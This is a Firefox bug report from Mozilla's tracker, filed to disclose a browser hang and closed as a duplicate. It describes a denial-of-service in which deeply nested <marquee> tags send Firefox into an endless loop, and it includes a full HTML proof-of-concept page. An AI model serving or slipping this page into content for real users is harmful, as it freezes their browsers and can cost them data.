Closed Bug 344577 Opened 18 years ago Closed 18 years ago

DoS attack while browsing site with <marquee> HTML tag

Categories

(Firefox :: Security, defect)

defect
Not set
critical

Tracking

()

RESOLVED DUPLICATE of bug 339954

People

(Reporter: al4321, Unassigned)

Details

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.0.4) Gecko/20060508 Firefox/1.5.0.4 Build Identifier: FireFox 2.0 BETA 1 Try to open any HTML file with lots of HTML <marquee> commands, and your browser goes infinite loop. sample code that loops FireFox: ================================================================================= <html> <head> <title>Credit to n00b..</title> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> </head> <body> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee> <marquee><marquee><marquee><marquee><marquee><marquee><marquee><marquee> <marquee><marquee><marquee><marquee></marquee></marquee></marquee></marq uee></marquee></marquee></marquee></marquee></marquee></marquee></marque e></marquee></marquee></marquee></marquee></marquee></marquee></marquee> </marquee></marquee></marquee></marquee></marquee></marquee></marquee></ marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma rquee></marquee></marquee></marquee></marquee></marque e></marquee></marquee></marquee></marquee></marquee></marquee></marquee> </marquee></marquee></marquee></marquee></marquee></marquee></marquee></ marquee></marquee></marquee></marquee></marquee></marquee></marquee></ma rquee></marquee></marquee></marquee></marquee></marquee></marquee></marq uee></marquee> </body> </html> Reproducible: Always Steps to Reproduce: 1.open any HTML file containing many <marque> tags 2. 3. Actual Results: FireFox (including latest 1.5.0.4 and 2.0 BETA 1) loops forever. Expected Results: should exit from loop without data loss.
Please search before filing a bug. *** This bug has been marked as a duplicate of 339954 ***
Status: UNCONFIRMED → RESOLVED
Closed: 18 years ago
Resolution: --- → DUPLICATE
You need to log in before you can comment on or make changes to this bug.